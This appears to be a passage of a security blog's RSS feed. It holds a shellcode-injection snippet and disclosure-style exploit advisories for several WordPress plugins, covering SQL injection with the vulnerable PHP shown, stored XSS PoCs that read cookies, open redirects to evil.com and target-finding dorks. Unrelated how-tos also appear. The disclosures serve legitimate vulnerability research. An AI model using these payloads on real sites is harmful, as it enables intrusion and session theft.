style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#00a8c8&#34;&gt;None&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;shellcode_address&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#00a8c8&#34;&gt;None&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;byref&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;t_id&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;)):&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#75715e&#34;&gt;# Cannot start thread&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#00a8c8&#34;&gt;return&lt;/span&gt; &lt;span style=&#34;color:#00a8c8&#34;&gt;False&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#00a8c8&#34;&gt;return&lt;/span&gt; &lt;span style=&#34;color:#00a8c8&#34;&gt;True&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Injection is performerd trough &lt;code&gt;CreateRemoteThread&lt;/code&gt; which is not supported on Windows Vista, 7 and 8 (you ought to use &lt;a href=&#34;http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Thread/NtCreateThreadEx.html&#34;&gt;&lt;code&gt;NtCreateThreadEx&lt;/code&gt;&lt;/a&gt; instead).&lt;/p&gt;</description>
    </item>
    <item>
      <title>What&#39;s New in xsssniper 0.8.x</title>
      <link>https://cloudberry.engineering/article/whats-new-in-xsssniper-08x/</link>
      <pubDate>Fri, 24 Feb 2012 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/article/whats-new-in-xsssniper-08x/</guid>
      <description>&lt;p&gt;After some months of development xsssniper has become more stable and a lot has changed since initial releases so it&amp;rsquo;s about time to peek under the hood of current version: 0.8.x.&lt;/p&gt;&#xA;&lt;p&gt;First and foremost it&amp;rsquo;s important to highlight that the goal of this tool is to test an entire web application automatically with minimum human intervention (maybe &lt;em&gt;xssnuker&lt;/em&gt; would be a better name!).&lt;/p&gt;&#xA;&lt;p&gt;With this in mind the biggest change has been done on the injection engine.&#xA;In first versions an user intervention was needed to choose wich xss payload (&lt;em&gt;Y&lt;/em&gt;) to inject and what artifacts (&lt;em&gt;Z&lt;/em&gt;) to check in responses:&lt;/p&gt;</description>
    </item>
    <item>
      <title>WordPress Mingle Forum &lt;= 1.0.32.1 Multiple Vulnerabilities</title>
      <link>https://cloudberry.engineering/article/wordpress-mingle-forum-multiple-vulnerabilities/</link>
      <pubDate>Sat, 21 Jan 2012 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/article/wordpress-mingle-forum-multiple-vulnerabilities/</guid>
      <description>&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# Exploit Title: WordPress Mingle Forum plugin &amp;lt;= 1.0.32.1 Multiple Vulnerabilities&#xA;# Date: 2012/01/18  &#xA;# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)&#xA;# Software Link: http://downloads.wordpress.org/plugin/mingle-forum.1.0.32.1.zip&#xA;# Version: 1.0.32.1&#xA;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;You need an authenticated session to exploit the following vulnerabilities.&lt;/p&gt;&#xA;&lt;h2 id=&#34;1-sql-injection&#34;&gt;1) SQL Injection:&lt;/h2&gt;&#xA;&lt;p&gt;POST: admin.php?page=mfgroups&amp;amp;mingleforum_Action=usergroups&#xA;delete_usergroups: Delete&#xA;dele_usrgrp%5B%5D: 1 [SQLI]&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Vulnerable code:&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#272822;background-color:#fafafa;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-php&#34; data-lang=&#34;php&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#00a8c8&#34;&gt;function&lt;/span&gt; &lt;span style=&#34;color:#75af00&#34;&gt;delete_usergroups&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(){&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#00a8c8&#34;&gt;if&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#75af00&#34;&gt;isset&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;$_POST&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;[&lt;/span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;&amp;#39;delete_usergroups&amp;#39;&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;])){&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#00a8c8&#34;&gt;global&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;$wpdb&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;,&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;$table_prefix&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;$delete_usrgrp&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;$_POST&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;[&lt;/span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;&amp;#39;delete_usrgrp&amp;#39;&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;];&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;$groups&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#d88200&#34;&gt;&amp;#34;&amp;#34;&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;$count&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#75af00&#34;&gt;count&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;$delete_usrgrp&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;);&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#00a8c8&#34;&gt;for&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;$i&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;;&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;$i&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;&amp;lt;&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;$count&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;;&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;$i&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;++&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;){&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                &lt;span style=&#34;color:#111&#34;&gt;$wpdb&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&#34;color:#75af00&#34;&gt;query&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;&amp;#34;DELETE FROM &amp;#34;&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;$table_prefix&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;&amp;#34;forum_usergroups WHERE id = &lt;/span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;{&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;$delete_usrgrp&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;[&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;$i&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;]&lt;/span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;}&lt;/span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;&amp;#34;&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;);&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                &lt;span style=&#34;color:#111&#34;&gt;$wpdb&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&#34;color:#75af00&#34;&gt;query&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;&amp;#34;DELETE FROM &amp;#34;&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;$table_prefix&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;&amp;#34;forum_usergroup2user WHERE `group` = &lt;/span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;{&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;$delete_usrgrp&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;[&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;$i&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;]&lt;/span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;}&lt;/span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;&amp;#34;&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;);&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#111&#34;&gt;}&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#00a8c8&#34;&gt;return&lt;/span&gt; &lt;span style=&#34;color:#00a8c8&#34;&gt;true&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#111&#34;&gt;}&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#00a8c8&#34;&gt;return&lt;/span&gt; &lt;span style=&#34;color:#00a8c8&#34;&gt;false&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id=&#34;2-sql-injection&#34;&gt;2) SQL Injection:&lt;/h2&gt;&#xA;&lt;p&gt;POST: admin.php?page=mfgroups&amp;amp;mingleforum_action=usergroups&amp;amp;do=add_user_togroup            togroupusers: users&#xA;usergroup:    bar [SQLI]&#xA;add_user_togroup: Add+users&lt;/p&gt;</description>
    </item>
    <item>
      <title>WordPress Shortcode Redirect &lt;= 1.0.01 Stored XSS</title>
      <link>https://cloudberry.engineering/article/wordpress-shortcode-redirect-stored-xss/</link>
      <pubDate>Sat, 21 Jan 2012 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/article/wordpress-shortcode-redirect-stored-xss/</guid>
      <description>&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# Exploit Title: WordPress Shortcode Redirect plugin &amp;lt;= 1.0.01 Stored XSS&#xA;# Dork: inurl:/wp-content/plugins/shortcode-redirect/&#xA;# Date: 2012/01/18 &#xA;# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)&#xA;# Software Link: http://downloads.wordpress.org/plugin/shortcode-redirect.1.0.01.zip&#xA;# Version: 1.0.01&#xA;&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;vulnerability&#34;&gt;Vulnerability&lt;/h2&gt;&#xA;&lt;p&gt;You need permissions to write a post (HTML mode) to exploit the shortcode:&lt;/p&gt;&#xA;&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[redirect url=&amp;#39;http://wherever.com&amp;#34;[XSS]&amp;#39; sec=&amp;#39;500&amp;#34;[XSS]&amp;#39;]&#xA;&lt;/code&gt;&lt;/pre&gt;</description>
    </item>
    <item>
      <title>WordPress uCan Post &lt;= 1.0.09 Stored XSS</title>
      <link>https://cloudberry.engineering/article/wordpress-ucan-post-stored-xss/</link>
      <pubDate>Thu, 19 Jan 2012 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/article/wordpress-ucan-post-stored-xss/</guid>
      <description>&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# Exploit Title: WordPress uCan Post plugin &amp;lt;= 1.0.09 Stored XSS&#xA;# Dork: inurl:/wp-content/plugins/ucan-post/&#xA;# Date: 2012/01/18&#xA;# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)&#xA;# Software Link: http://downloads.wordpress.org/plugin/ucan-post.1.0.09.zip&#xA;# Version: 1.0.09&#xA;&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;vulnerability&#34;&gt;Vulnerability&lt;/h2&gt;&#xA;&lt;p&gt;You need permissions to publish a post from the public interface:&#xA;The submission form is not well sanitized and will result in stored xss&#xA;in admin pages:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&#xA;&lt;p&gt;&lt;strong&gt;Name field&lt;/strong&gt; is not sanitized and it&amp;rsquo;s injectable with a payload&#xA;which will be stored in the pending submission page in admin panel&#xA;&lt;strong&gt;POC:&lt;/strong&gt; myname&amp;rsquo;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;window.alert(document.cookie)&amp;lt;/script&amp;gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>WordPress Age Verification &lt;= 0.4 Open Redirect</title>
      <link>https://cloudberry.engineering/article/wordpress-age-verification-open-redirect/</link>
      <pubDate>Tue, 10 Jan 2012 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/article/wordpress-age-verification-open-redirect/</guid>
      <description>&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# Exploit Title: WordPress Age Verification plugin &amp;lt;= 0.4 Open Redirect&#xA;# Date: 2012/01/10&#xA;# Dork: inurl:wp-content/plugins/age-verification/age-verification.php&#xA;# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)&#xA;# Software Link: http://downloads.wordpress.org/plugin/age-verification.zip&#xA;# Version: 0.4&#xA;&lt;/code&gt;&lt;/pre&gt;&lt;ol&gt;&#xA;&lt;li&gt;&#xA;&lt;p&gt;Via GET: http://server/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com&#xA;The rendered page will provide a link to &lt;a href=&#34;http://www.evil.com&#34;&gt;http://www.evil.com&lt;/a&gt;&lt;/p&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;&#xA;&lt;p&gt;Via POST: http://server/wp-content/plugins/age-verification/age-verification.php&#xA;redirect_to:    &lt;a href=&#34;http://www.evil.com&#34;&gt;http://www.evil.com&lt;/a&gt;&#xA;age_day:        1&#xA;age_month:      1&#xA;age_year:       1970&#xA;Direct redirect to &lt;a href=&#34;http://www.evil.com&#34;&gt;http://www.evil.com&lt;/a&gt;&lt;/p&gt;&#xA;&lt;/li&gt;&#xA;&lt;/ol&gt;</description>
    </item>
    <item>
      <title>WordPress Pay With Tweet &lt;= 1.1 Multiple Vulnerabilities</title>
      <link>https://cloudberry.engineering/article/wordpress-pay-with-tweet-multiple-vulnerabilities/</link>
      <pubDate>Fri, 06 Jan 2012 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/article/wordpress-pay-with-tweet-multiple-vulnerabilities/</guid>
      <description>&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# Exploit Title: WordPress Pay With Tweet plugin &amp;lt;= 1.1 Multiple Vulnerabilities&#xA;# Date: 01/06/2012&#xA;# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)&#xA;# Software Link: http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip&#xA;# Version: 1.1&#xA;&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;1-blind-sql-injection-in-shortcode&#34;&gt;1) Blind SQL Injection in shortcode:&lt;/h2&gt;&#xA;&lt;p&gt;Short code parameter &amp;lsquo;id&amp;rsquo; is prone to blind sqli,&#xA;you need to be able to write a post/page to exploit this:&lt;/p&gt;&#xA;&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[paywithtweet id=&amp;#34;1&amp;#39; AND 1=2&amp;#34;]&#xA;[paywithtweet id=&amp;#34;1&amp;#39; AND 1=1&amp;#34;]&#xA;&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;2-multiple-xss-in-payphp&#34;&gt;2) Multiple XSS in pay.php&lt;/h2&gt;&#xA;&lt;p&gt;&lt;a href=&#34;http://target.com/wp-content/plugins/pay-with-tweet.php/pay.php&#34;&gt;http://target.com/wp-content/plugins/pay-with-tweet.php/pay.php&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;After connecting to twitter:&lt;/p&gt;</description>
    </item>
    <item>
      <title>A Simple Debugger</title>
      <link>https://cloudberry.engineering/note/a-simple-debugger/</link>
      <pubDate>Sat, 24 Dec 2011 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/note/a-simple-debugger/</guid>
      <description>&lt;p&gt;Simple Debugger (sdbg) is a minimal Windows debugger I wrote to sharpen my knowledge of debugging practices.&lt;/p&gt;&#xA;&lt;p&gt;It&amp;rsquo;s written in python and it&amp;rsquo;s obviously coded on top of the wonderful ctypes library. The overall architecture is heavily based on PyDbg since I was already familiar.&lt;/p&gt;&#xA;&lt;p&gt;At the moment of this writing it&amp;rsquo;s capable of setting soft, hard and memory breakpoints, it has a minimal interactive shell to retrieve registers status and it&amp;rsquo;s expandable with custom callbacks for handling exceptions.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Introducing xsssniper</title>
      <link>https://cloudberry.engineering/article/introducing-xsssniper/</link>
      <pubDate>Fri, 16 Sep 2011 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/article/introducing-xsssniper/</guid>
      <description>&lt;p&gt;I wrote a little app called &lt;em&gt;xsssniper&lt;/em&gt; to automatically test XSS injection&#xA;points in target URLs.&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#272822;background-color:#fafafa;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ python xsssniper.py --url &lt;span style=&#34;color:#d88200&#34;&gt;&amp;#39;X&amp;#39;&lt;/span&gt; --payload &lt;span style=&#34;color:#d88200&#34;&gt;&amp;#39;Y&amp;#39;&lt;/span&gt; --check &lt;span style=&#34;color:#d88200&#34;&gt;&amp;#39;Z&amp;#39;&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;What it does is scanning target URL for GET parameters and then inject an&#xA;XSS payload (Y) into them and parse the response for artefacts of the&#xA;injection (Z).&lt;/p&gt;&#xA;&lt;p&gt;The simplest example would be to inject&#xA;&lt;code&gt;&amp;lt;script type=&amp;quot;text/javascript&amp;quot;&amp;gt;window.alert(&#39;lol&#39;)&amp;lt;/script&amp;gt;&lt;/code&gt; and check for&#xA;&lt;code&gt;&amp;lt;script type=&amp;quot;text/javascript&amp;quot;&amp;gt;window.alert(&#39;lol&#39;)&amp;lt;/script&amp;gt;&lt;/code&gt;, if we have a match maybe we have&#xA;just found an XSS.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Tor &#43; Polipo on OpenBSD</title>
      <link>https://cloudberry.engineering/article/tor-polipo-on-openbsd/</link>
      <pubDate>Tue, 14 Jun 2011 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/article/tor-polipo-on-openbsd/</guid>
      <description>&lt;p&gt;Quick how-to install &lt;a href=&#34;http://www.torproject.org&#34;&gt;Tor&lt;/a&gt; and &lt;a href=&#34;http://www.pps.jussieu.fr/~jch/software/polipo/&#34;&gt;Polipo&lt;/a&gt; on OpenBSD 4.8, and route almost all the traffic trough them by deafult.&lt;/p&gt;&#xA;&lt;p&gt;For simplicity I&amp;rsquo;ve installed from packages. As root:&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#272822;background-color:#fafafa;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ pkg_add tor&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ pkg_add polipo&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Next we need to configure Polipo to use Tor and we can take advantage of the sample config file provided by Tor itself:&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#272822;background-color:#fafafa;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ &lt;span style=&#34;color:#111&#34;&gt;cd&lt;/span&gt; /etc/polipo&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ mv config config.old&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ wget http://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ mv polipo.conf config&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The part worth noticing is this (&lt;code&gt;9050&lt;/code&gt; is Tor default port):&lt;/p&gt;</description>
    </item>
    <item>
      <title>Pastebin v3 Command Line Script</title>
      <link>https://cloudberry.engineering/note/pastebin-v3-command-line-script/</link>
      <pubDate>Wed, 13 Apr 2011 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/note/pastebin-v3-command-line-script/</guid>
      <description>&lt;p&gt;Since I haven&amp;rsquo;t managed to find a command line pastebin script whose&#xA;based on the &lt;a href=&#34;http://pastebin.com/api&#34;&gt;new APIs&lt;/a&gt; I wrote one.&lt;/p&gt;&#xA;&lt;p&gt;You can find it &lt;a href=&#34;https://bitbucket.org/gbrindisi/pastebin/&#34;&gt;on my bitbucket&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Usage:&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#272822;background-color:#fafafa;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ pastebin.py -f python -e 10M -p &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; -t MyPaste &lt;span style=&#34;color:#111&#34;&gt;&amp;amp;&lt;/span&gt;lt&lt;span style=&#34;color:#111&#34;&gt;;&lt;/span&gt; whatever&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Pratically you just pipe your data to the script.&lt;/p&gt;&#xA;&lt;p&gt;Here are some options:&lt;/p&gt;&#xA;&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;-f defines data format (php, python, etc)&#xA;-e the expiry time (10M, 1G, 1D, N)&#xA;-p the privacy (1 is private, 0 is public)&#xA;-t the title of the paste&#xA;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The script looks for a config file in your home dir with &lt;a href=&#34;http://pastebin.com/api#1&#34;&gt;your dev API&#xA;key&lt;/a&gt; and optionally an username and a valid password (without valid login&#xA;credentials your pastes will be anonymous).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Run Xmonad on Snow Leopard</title>
      <link>https://cloudberry.engineering/article/run-xmonad-on-snow-leopard/</link>
      <pubDate>Thu, 16 Dec 2010 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/article/run-xmonad-on-snow-leopard/</guid>
      <description>&lt;p&gt;This is a little how-to install and execute &lt;a href=&#34;http://xmonad.org&#34;&gt;xmonad&lt;/a&gt; under X11.app on&#xA;Snow Leopard.&lt;/p&gt;&#xA;&lt;p&gt;First thing to do (if you haven&amp;rsquo;t yet) is installing the Haskell platform. I&#xA;use &lt;a href=&#34;https://github.com/mxcl/homebrew&#34;&gt;Homebrew&lt;/a&gt; as my packet manager of choice:&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#272822;background-color:#fafafa;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;brew install haskell-platform&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Next we are going to install xmonad from Cabal:&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#272822;background-color:#fafafa;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;cabal update&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;cabal install xmonad&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now that everything is installed correctly we need to tweak our X11.app&#xA;settings 